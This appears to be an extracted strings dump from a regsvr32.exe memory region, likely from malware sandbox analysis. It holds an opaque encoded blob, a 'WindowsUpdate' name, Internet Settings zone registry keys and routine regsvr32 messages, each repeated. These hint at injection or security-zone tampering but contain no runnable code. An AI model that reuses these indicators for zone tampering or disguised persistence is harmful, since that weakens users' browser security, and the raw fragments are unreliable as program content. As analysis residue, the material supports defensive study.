bzro3D5O6ik6sE0BuDHsigH/XFEo5SD/UKpipt1zQ11EPjOhmv6dC1vSzbLNnEs5HqvkoR8VbycEtwuQnbrKmNwU0Sp4AeWVgbBdnrE5xzDmwwOrb8RLf4uRdDA zvyp3YIUEdbFClyI23sYMzZeerviJKmli5sKAggtA156MBwy9X/My1znXqE4CN2WHGw98w3J29lYdy7qdrdr7aGfFNmLSRsYrLyI02yQztq851Q4eXQrm5xFP8c2/QaWoPF7Z6ob qAhvzrQwZlYBD0h31As6eIoGOjyFxafA0VSbup8aGEVwQObH2KIMEWFWzgS3JdHf7qeddf0PdbwhZSYGJNhAfgZ289xjomb9SFLC6Vk4bqWrtBvwDi5Czg7IZWpeJCSmtArzWeI7d TJDIxqe/fbzTPcpwmrvaEonoVpehdPpV1MQskviMtIE3Z5SW5JgLrgs3E2uVBhDgS8HTlM0QUql1obCFr5z2BdK22XoIHAWC cmO0tstqUbrq/8KwSEcRPzEH12ecc fNtVTp/vuJlHs3jUQj13JKP774TjCiTaRNW1Aaz4vw1O1JKUW5J4CJ80TjsBKRIPI6/eHJEo6j1Vjkvifhco5D2pO3u6brdl3IXn2 y/un7ls5fOeCOxd20OhKjLfonN6gpamBjg5aTMF3HxJCKkV6f2P/DY78GJky1PMRq9eH0K3GLxNAXKinpfumKxCOw6YXADqtFJP5zaZEScGB0JpdHQoTZN4rIXdVfPFMzY9WTdVGLZFR8rJZsTfrXjjgTAwX808MmwMADEd ImzwqbwsVElFZdYpIWhPNTJ7dQlAtH3TxogwAoqXyhgN89aKS22cu2INrv88EzRacDX6JsuC/OwbB036BxOKMOWbTszedY5Z01rxrpinmcY1hhQ3dR/Tm34IAqK9es49Eq4mWsYLS EvDfwMZG6jVTFZ56aUqdpnTT65dtypBA0j3/FxoK8CsWoTEfpiWdzXsTxjusrVSL5Xcmm49fmZekYH1T/fYQvwb6wHs51d9t0GaRO6JFLMOY7BNAAXiQ3uFj0nXC0uPaAD0CTAgwZU8BBM/PE9ZsZHdjbVPlbKZkd LMkQIdF60X9 PA2SkRhSMVguUVWfqP0DoklC7dc9g0bUsUVK0ngMjMbjsGsV4XuwprrJ xZgn93uPe0k5TWrizXLSvWkpe779CdGRa BH/NoP6jPKdgn9SNCBvTuLyaLI6E7sNu WjWOQzXP/n31Y9Yx7wg5DWeOKPHQhz0v7Tv4OFuiCYr5cLLTyQHOcttcQxtlHx6i3WfZ1IhhMmM7sSwQrBSg/immXJmf73xxfdzZZaxbqitMIO3EUjfOwLSb/92m3Ma6zGguU/ZhLSuRF7H3IRgHGj2zUal1eyopZvpqoDLXACLiBjK G5DTHc7qze8Aq9wbxOp8z8IMU5/TyDuayY9LfsSKp6V9xFRCfXLKFwz23W 1q8OGAMYX74Be Fu3dwEW2tT9mGHflTbsjXRteUDBsAViTteWkGnZ7qTLlqfK7u8W0UNdvQSBQ8V32tKUYUa li8XWA7E qhyHptmW/ryVqALJtfA5mRG/6NnqfqmOFS8ACGKtbbgBBVSXbJnU02mBNLs9APkC iNSbH/45SkXEWyTuj/v0WfhBEqZ4csZsedP4sTCrp6SqQ5LGavvbL/Jroeiq4/wkk9jDjb24vDL1hvP8RbKkxGft2If8ByHeacQrDP6ing2aeh4QJWyTyv7Izwl8rx0rdN8Ctg4tPnViU hCRqlK AnenBy0oj9iuJMQGLjfTeMmfTYhX VtocONi90cFUoFoXY6RhpvOVQlUqLagtkcYN4HfQeRJJnPZ4npyD7TjUOYK8HMm1lCl4tuWqIQNmADXKjY1sNHvxynAX0toNiSaTz5ZlvvO87TaqumHod4dUj1Vioa5L78vZeDZ1eVzDxmzqvuP8daJqRWFj9CfAgB00QyaO68z1RPs69eBTWYenvQhhWLnECcsUo9Oo/7yVD54qXddSedf4FF0Y1phD5wri6KjGEsaGJfwVUKC/dmEK5nPlA7F7KlxItFk 5rTseZVu6AKTgI7ALW2aIMIm65ze4R9tX7QmZIP6kUatdcPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD1

WindowsUpdate

WindowsUpdate

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

66006666

66006666

regsvr32.exe_1296_rwx_01000000_00005000:

.text

.text

`.data

`.data

.rsrc

.rsrc

msvcrt.dll

msvcrt.dll

ADVAPI32.dll

ADVAPI32.dll

KERNEL32.dll

KERNEL32.dll

NTDLL.DLL

NTDLL.DLL

USER32.dll

USER32.dll

ole32.dll

ole32.dll

regsvr32.pdb

regsvr32.pdb

_wcmdln

_wcmdln

RegCloseKey

RegCloseKey

RegOpenKeyExW

RegOpenKeyExW

Excessive # of DLL's on cmdline

Excessive # of DLL's on cmdline

5.1.2600.5512 (xpsp.080413-2105)

5.1.2600.5512 (xpsp.080413-2105)

REGSVR32.EXE

REGSVR32.EXE

Windows

Windows

Operating System

Operating System

5.1.2600.5512

5.1.2600.5512

Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname

Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname

Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall

Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall

Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.

Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.

LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.

LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.

%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.

%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.

OleUninitialize failed.["%1" is not an executable file and no registration

OleUninitialize failed.["%1" is not an executable file and no registration